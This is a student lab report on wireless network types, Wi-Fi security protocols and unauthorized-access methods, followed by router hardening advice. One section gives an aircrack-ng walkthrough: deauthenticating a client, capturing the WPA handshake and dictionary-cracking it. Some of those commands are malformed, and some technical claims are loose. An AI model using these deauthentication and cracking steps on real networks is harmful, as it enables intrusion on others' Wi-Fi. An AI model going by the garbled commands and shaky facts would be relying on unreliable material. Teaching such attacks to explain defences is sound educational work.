Wireless Networks - Functionalities and Security Keys - Lab Report Example

SECURITY KEYS by Student’s Name Code + Course Name Professor’s Name University Name City, State Date Table of Contents WIRELESS NETWORKS 3 Types of wireless networks 3 ii) Wireless local Area Network (WLAN) 3 iii) Wireless mesh network 4 iv) Wireless Metropolitan Area Network 4 v) Wireless Wide Area Network 4 vi) Global Area Network 4 vii) Space network 4 Wireless Network and its Functionalities 4 i) Network Elements 5 ii) Mobile switching station 5 iii) Base Station 5 Wireless Security 5 i) Wired Equivalent Privacy (WEP) 6 ii) Wi-Fi Protected Access (WPA) 6 Ways of Unauthorized Access. 6 i) Man-in-the-middle attacks 6 ii) Accidental association 6 iii) Ad hoc network 7 iv) Identity theft 7 v) Denial of service 7 vi) Malicious association 7 Attack Implementation 7 Securing Passwords in Wireless Networks 11 WIRELESS NETWORKS A wireless network is a type of computer network involving the use of wireless data connections among network nodes. The network is implemented at the physical layer of the OSI model (Gupta and Kumar 2000). Types of wireless networks There are different types of wireless networks. They include: i) Wireless personal area network It is an interconnection of devices within a small area. Examples include Bluetooth links, radio, and infrared links. ii) Wireless local Area Network (WLAN) It involves links between two or more devices over a short distance. Wireless distribution mechanism usually provides the connection. Access points are used for connection to the internet. It uses the spread-spectrum technologies. It allows free movement within coverage area without loss of connection. It is mostly used include institutions of learning and/or cities (Gupta and Kumar 2000). iii) Wireless mesh network It is an organization of radio nodes in a mesh topology. Each node relays messages on behalf of other nodes. iv) Wireless Metropolitan Area Network It connects several wireless local area networks. v) Wireless Wide Area Network It covers a relatively large area. It can connect branches of an organization to the head office. Connection between access points is usually point-to-point microwave links. Parabolic dishes are used(Gupta and Kumar 2000). vi) Global Area Network It covers an arbitrary number of wireless local area networks, satellite and covers a large area (Gupta and Kumar 2000). vii) Space network Is the kind of communication used by spacecraft (Gupta and Kumar 2000). Wireless Network and its Functionalities A wireless network set up consists of three major elements i) Network Elements They are stand alone systems, products or devices used by a wireless carrier. They provide support for the network. They are logical entities that unite one or more devices (Varshney and Vetter 2000). ii) Mobile switching station It is the primary service delivery node. It is responsible for routing. It sets up and releases the end-to-end connection. In addition, it handles mobility and hand-over requirements in the network (Varshney and Vetter 2000). iii) Base Station It is basically a transceiver. It connects a number of devices over a wide area. It acts as a router for the computers in the network as well as connecting them to the internet. Wireless Security It is the prevention of unauthorized access to computers over a wireless network. It involves ensuring only users with network privileges access resources provided in the network. Common securities include: i) Wired Equivalent Privacy (WEP) It is weak IEEE 802.11 standard. It employs the use of passwords that can often be cracked with basic computers and a variety of widely available cracking tools (Varshney and Vetter 2000). ii) Wi-Fi Protected Access (WPA) It employs the use of an encryption device. The device encrypts the network with a256-bit key. The key improves the security since it is long. Ways of Unauthorized Access. i) Man-in-the-middle attacks An attacker sets up a soft access point. He then lures users to connect to it. Once connected, he then connects to a real access point through another wireless card. As users receive a steady flow of traffic, it raises no suspicions. A hacker can force the computers to re-connect with his soft access point and record the event. Once recorded, he can retrieve passwords from the events and implement real attacks on the network (Varshney and Vetter 2000). ii) Accidental association It occurs when a user powers on a computer in an organization and the computer latches onto a wireless access point in a nearby organization. In the scenario, the user is unaware of the connection. It will serve as a bridge to penetration by an attacker (Varshney and Vetter 2000). iii) Ad hoc network It is a peer-to-peer network. There are no access points between the devices. It involuntarily forms a bridge to attackers as they can force the devices to re-connect and record the event. From the recording passwords can be sniffed. iv) Identity theft It is possible for an attacker to listen in on a network. The attacker then identifies MAC address of a computer with network privileges and can fake as the device to access the network (Varshney and Vetter 2000). v) Denial of service An attacker bombards targeted access point with fake requests continuously. He may also use premature successful connection messages among other commands. It denies legitimate users access to the network. During the network’s recovery, he may capture the re-transmitted initial handshake codes. With the use of the codes and cracking tools, he will obtain the login passwords (Varshney and Vetter 2000). vi) Malicious association The attacker makes active wireless devices as soft access points. Users connect to the company network through them. The attacker then plants Trojans and sniffs passwords. Attack Implementation The attack is implementedsing Kali Linux air crack suite. 1. On a terminal, type the command ifconfig hit enter Note down the wireless adapter wlan 2. Enable monitor mode using the command airmon –ng start wlan0 3. Start the wlan0 using the command airmon –ng start wlan0 4. Capture packets using the command airodump –ng wlan0 4. Identify a target from the list 5. Store captured packets in a file. Airodump –ng –c [channel] –bssid [bssid] –w /root/Desktop/ wlanmon e.g. airodump –ng –c 6 –bssid 90:18:7C:11:DD:C7 –w /root/Desktop/ wlan0mon 5. Leave airodump running and open new terminal and type the command Aireplay –ng -0 2 –a 90:18:7C:11:DD:C7 –c D0:22:BE:C2:82:6Ewlan0mon 6. Open new terminal and type Aircrack –ng –a2 –b 90:18:7C:11:DD:C7 –w rockyou.txt wifi Desktop-01.cap to obtain the key Be patient as a key is generated Finally a key is found. Securing Passwords in Wireless Networks As shown in the attack above, it is possible for one to achieve a successful intrusion and gain access to your network. To overcome this, take the following measures: 1. Use a passphrase A password is usually 4 to 16 characters long. A passphrase is a sequence of characters. It comprises letters, symbols and numbers. It is usually longer than a password. It is used to digitally authenticate users to a computer system, program or its data. Rather than use of plain text, it is good practice that one uses a passphrase as it would take logically longer to decrypt. 2. Change Router Default Passwords Make sure to change preset passwords used to administer the device settings. Most attackers probably have knowledge of them. 3. Change Default Network Name A service set identifier (SSID) is the network’s name. a device searches and lists all networks that publicly broadcast their SSIDs. Change the name but be cautious not to use personal information. 4. Turn Firewall On Routers contain built-in firewalls. Be sure that it is turned on. Most have them off. Once installed, turn it on for protection against intrusions. 5. Turn Encryption On Once installed, check and ensure the router’s encryption feature in enabled. Recent encryption is WPA2. Turning it on requires a password. Use a passphrase (combination of letters, numbers and symbols) to make it more secure. 6. Turn Network Name Broadcasting Off In a scenario that your network is a private one, turn network name broadcasting off. It will not be included in the list of available wireless networks to a Wi-Fi enabled device. 7. Use Media Access Control Address Filter Devices capable of connecting to a Wi-Fi have a unique ID, MAC address. Routers can screen MAC addresses that connect to them. It can also be set to accept connection to a preset list of MAC addresses it can recognize using the MAC address filter. It sets an obstacle for possible intrusion. 8. Turn off your wireless network when not in use for long periods. 9. Have anti-virus and anti-spyware software installed in devices accessing the network. References Gupta, P., & Kumar, P. R. 2000, The capacity of wireless networks. Information Theory, IEEE Transactions on, 46(2), 388-404. Varshney, U., & Vetter, R. 2000, Emerging mobile and wireless networks. Communications of the ACM, 43(6), 73-81. Read More